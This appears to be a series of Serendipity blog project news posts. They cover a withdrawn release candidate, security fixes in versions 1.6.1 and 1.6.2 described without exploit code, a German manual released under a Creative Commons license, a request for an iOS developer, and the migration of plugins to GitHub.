The 1.7-rc1 that has been published today has an issue with older Serendipity plugins existing on prior installations, preventing Serendipity 1.7 to operate properly. While we fix this issue for an upcoming rc2, this problematic rc1 has been removed at this point.
UPDATED: 2012-05-22 12:00 to clarify impact.
Good and bad things come in doubles, it seems. We are sorry to inform you that another security issue in Serendipity has been found by the High-Tech Bridge SA Security Research Lab (Advisory HTB23092). This issue has been reported today at 11:27 and we're happy to provide a quick fix for that.
You can either download the full 1.6.2 release, or apply this simple fix to the file include/functions_trackbacks.inc.php: diff on github.
The error here is that input is not properly validated and can be used (when magic_quotes_gpc is off) to inject SQL code to a SQL query; since our DB layer does not execute multiple statements, and the involved SQL query is not used to produce output code. Thanks to Pawel Golen it was made clear to us that this issue can in fact be used to remotely access the database through blind sql injection attacks (this method however is really slow and creates a lot of traffic, since only using 0/1 as a result of the exploit will mean a lot of queries to deduce the content). Thus you should definitely upgrade your installation.
Serendipity is an open-source based product with no specific funding, so we depend on nice people like High-Tech Bridge, Stefan Schurtz, Hanno Böck and all the others of the past to report issues to us. In turn we promise to fix them as quickly and transparently as possible.
Serendipity 1.6.1 has just been released. As usual you can simply download from s9y.org, extract the archive, upload it to your webspace and accept the upgrader when visiting your blog.
This release mainly addresses two security issues found by Stefan Schurtz (thanks a lot, again!). One is a XSS issue in the media database panel, the other an SQL injection in the media database section. Both issues can only be exploited if you are logged in to your blog and you click a specially crafted link. The SQL injection cannot be used to extract sensitive information from the database or delete data.
Either way you are urged to upgrade your Blog to the latest version. Development versions of 2.0 and 1.7 on github have these bugs fixed as well.
Other bugfixes in this version include:
You might also want to check out our quite stable 1.7 development version which uses Smarty3, or even our 2.0 development version which contains major rewrites so that Smarty is used in the backend!
Das deutsche "Serendipity Handbuch" OpenSourcePress wurde vor einiger Zeit veröffentlicht, und der Verlag war so nett, die Rechte an den Buchinhalten zurückzuerhalten (auch dank des tatkräftigen Engagements von Dirk Deimeke und natürlich unserer tollen Community).
Das bedeutet, die Inhalte wurden nun unter einer CC-BY-NC-SA Lizenz veröffentlicht und können von der Community (also: EUCH!) frei gelesen, erweitert und möglicherweise auch übersetzt werden. Die meisten Dinge des Handbuchs finden auch heute noch Anwendung, aber es gibt genügend Spielraum für Verbesserungen.
Schaut euch das ganze hier an: Das Serendipity Handbuch. Die Dateien liegen im LaTeX format vor, ihr benötigt daher eine funktionierende LaTeX-Umgebung, um die Dateien kompilieren zu können. Die .tex-Dateien sind jedoch im Klartextformat, also keine fremde Scheu. :-)
Derzeit überlegen wir, in welchem Format das ganze endgültig und sinnvoll für die Benutzer und Mithelfer hinterlegt werden wird. Gerne diskutieren wir hierüber mit euch im Forum.
The german "Serendipity Manual" was published by OpenSourcePress some time ago. They were so kind to revert the publishing license back to our project (thanks to the great work of Dirk Deimeke and kind people like you), so that we can now publish it under a CC-BY-NC-SA license, and let the community (read: YOU!) be able to read the documentation for free, contribute to it, and hopefully even translate it to other languages. Many aspects of the book are still up to date, but surely many improvements can now be made.
Check it out here: The Serendipity Book. The files are written in LaTeX format, so you need a working LaTeX environment to compile it as PDF or other variants, if you like. We are currently working out the best format to use in the future; if you want, you can help us discuss this on the forums.
Grischa needs some help on updating the XML-RPC for more iOS clients. Here's the quote from his original posting of the s9y forum post:
At the moment I am enhancing the xml-rpc interface of Serendipity with WordPress functionality.
The idea: If Serendipity is able to emulate WordPress interfaces, we can use all the tools using it. WordPress is much more suported than S9Y as it is more known. I'm aiming on the mobile clients available for WordPress blogs in special at them moment.
The problem: The enhancements are nearly ready and successfully tested with the official WP for Android client, blogsy on iOS for iPad and MarsEdit and ecto for Mac. What is missing is the app for the iphone. The official WP for iOS client is able to register the blog and reads some categories but then it crashes without any message.
The developer team of WP for iOS was not very helpful on that but the client is available as Open Source.
As I am not able to debug iOS apps (I don't even have a Mac) I'm seeking an iOS developer being s9y fan, too, who is able to debug what goes wrong there, so I can finalize my changes on the s9y xml-rpc interface.
Thanks!
Since the core Serendipity project is now maintained on github.com and every developer is quite happy about that, we decided to go the jquery-plugins route and delete all Serendipity plugins.
No, just kidding. We actually imported all data from the SourceForge.net CVS servers into the github infrastructure. The short version for normal end-users: Nothing should change for you!
https://github.com/s9y/additional_plugins
https://github.com/s9y/additional_themes
All current Serendipity developers also have access to those repositories to contribute code. Developers now no longer should commit code to CVS (actually, they can't, because I took all their committing karma *eg*).
The harder task for the Spartacus infrastructure service is the actual publishing of data. The Spartacus plugin operates on a PEAR-like XML format for each plugin, which luckily is automatically generated by a small shellscript which runs once daily on one of our webservers (emerge.sh). That script iterates on a checkout of all plugins and templates, creates the XML and uploads it to all mirror servers (currently netmirror.org, s9y.org and now also github.com).
Downloading the files also either works via the files that are uploaded daily to netmirror.org and s9y.org, or you always could use the SourceForge.net server, that published the file via a nasty ViewVC oddity. The spartacus plugin of the current github core code (version 2.25) now can also retrieve those files from the Github.com servers.
For all users that currently use the Spartacus plugin with the SourceForge.Net mirror, our daily script now pushes all changes in the GitHub tree also to CVS, so that both repositories *should* be kept in sync. This is done via the gitclone.sh and gitclone.php scripts in the additional_plugins repository, for anyone that's interested.
Most likely, something in this script won't work properly, so in the next days it might be that some glitches in the matrix can occur. In that case, please report issues and remain seated. Or buy christmas presents for your beloved. Or your beloved developers.